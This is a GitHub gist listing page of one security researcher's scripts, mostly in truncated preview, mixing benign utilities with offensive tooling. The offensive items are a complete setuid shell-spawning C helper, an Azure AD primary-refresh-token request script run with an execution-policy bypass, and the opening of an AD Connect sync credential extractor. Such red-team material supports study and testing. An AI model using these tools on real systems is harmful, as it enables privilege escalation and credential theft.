Tijl Deneut tijldeneut
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <sys/types.h> | |
| #include <unistd.h> | |
| int main(void){ | |
| setreuid(geteuid(),-1); | |
| setregid(getegid(),-1); | |
| char *args[] = {"/bin/bash",0}; | |
| execve(args[0],args,0); | |
| return 0; | |
| } | |
| /* gcc uidswap.c -o uidswap && ./uidswap */ |
tijldeneut
/ AzureAD_Generate_Context.exe
Last active
January 7, 2022 14:07
AzureAD Generate Context
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #+-------------------------------------------------------------------+ | |
| #| = : = : = : = : = : = : = : = : = : = : = : = : = : = : = : = : = | | |
| #|{>/-------------------------------------------------------------\<}| | |
| #|: | Author: Aman Dhally | |
| #| :| Email: amandhally@gmail.com | |
| #| :| Web: www.amandhally.net/blog | |
| #| :| blog: http://newdelhipowershellusergroup.blogspot.com/ | |
| #| :| | |
| #|: | Purpose: | |
| #| :| Clean lapopt using removing un-wantede files |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| # -*- coding: utf-8 -*- | |
| # | |
| # Copyright 2020, Photubias <tijl.deneut@howest.be> | |
| # | |
| # Licensed under the Apache License, Version 2.0 (the "License"); | |
| # you may not use this file except in compliance with the License. | |
| # You may obtain a copy of the License at | |
| # | |
| # http://www.apache.org/licenses/LICENSE-2.0 |
tijldeneut
/ GetWindowsInfo.py
Last active
September 18, 2021 15:43
Decrypting and parsing some interesting and General Windows Information.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| # -*- coding: utf-8 -*- | |
| # | |
| # Copyright 2020, Photubias <tijl.deneut@howest.be> | |
| # | |
| # Licensed under the Apache License, Version 2.0 (the "License"); | |
| # you may not use this file except in compliance with the License. | |
| # You may obtain a copy of the License at | |
| # | |
| # http://www.apache.org/licenses/LICENSE-2.0 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # Created by Korey McKinley, Senior Security Consulant at LMG Security | |
| # https://lmgsecurity.com | |
| # July 12, 2019 | |
| # Converted to Python3 by Tijl Deneut | |
| # August 8, 2021 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Written by Photubias, based on https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/ | |
| ## Example: powershell -ep bypass .\RequestPRTToken.ps1 | |
| [CmdletBinding()] | |
| Param ( | |
| [Parameter(Mandatory=$True,Position=1)]$Nonce | |
| ) | |
| ## Example of a nonce: AQABAAAAAABeStGSRwwnTq2vHplZ9KL4zgnsAt1Vyqx2sMVQVwgmP4MYzWWJfjDXR9L2Jhc2lMCpYpyuFvqYQfHUwEMbVpk1woEIESAbkX-EdIr2ZpDtWiAA | |
| #$nonce = 'AQABAAAAAABeStGSRwwnTq2vHplZ9KL4zgnsAt1Vyqx2sMVQVwgmP4MYzWWJfjDXR9L2Jhc2lMCpYpyuFvqYQfHUwEMbVpk1woEIESAbkX-EdIr2ZpDtWiAA' | |
| #$query = '{"method": "GetCookies", "sender": "https://login.microsoftonline.com", "uri": "https://login.microsoftonline.com/common/oauth2/authorize?client_id=4345a7b9-9a63-4910-a426-35363201d503&response_mode=form_post&response_type=code+id_token&scope=openid+profile&state=OpenIdConnect.AuthenticationProperties%3dhiUgyLP6LnqNTRRyNpT0W1WGjOO_9hNAUjayiM5WJb0wwdAK0fwF635Dw5XStDKDP9EV_AeGIuWqN_rtyrl8m9t6pUGiXHhG3GMSSpW-AWcpfxW9D6bmWECYrN36_9zw&nonce=636957966885511040.YmI2MDIxNmItZDA0Yy00MjZlLThlYjAtYjNk |
tijldeneut
/ mp3convert.sh
Last active
August 8, 2021 19:01
MP4/MKV/WEBM to MP3 conversion of a folder with ffmpeg & lame
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env bash | |
| # My bash Script to convert mp4 to mp3 | |
| # By NerdJK23 & Photubias | |
| # web: www.computingforgeeks.com | |
| # email: kiplangatmtai@gmail.com | |
| # Requires | |
| # ffmpeg installed | |
| # lame installed |
tijldeneut
/ azuread_decrypt_msol.ps1
Last active
July 26, 2021 18:45
Decrypting local MSOL account password from a local, embedded SQL Server
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Write-Host "AD Connect Sync Credential Extract v3 (@_xpn_ & @tijldeneut)" | |
| Write-Host "`t[ Updated to support new cryptokey storage method ]" | |
| Write-Host "`t[ Updated to support Server 2019's new instance name ]`n" | |
| $client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync" | |
| try { | |
| $client.Open() | |
| } catch { | |
| Write-Host "[!] Could not connect to localdb with ADSync, trying ADSync2019..." |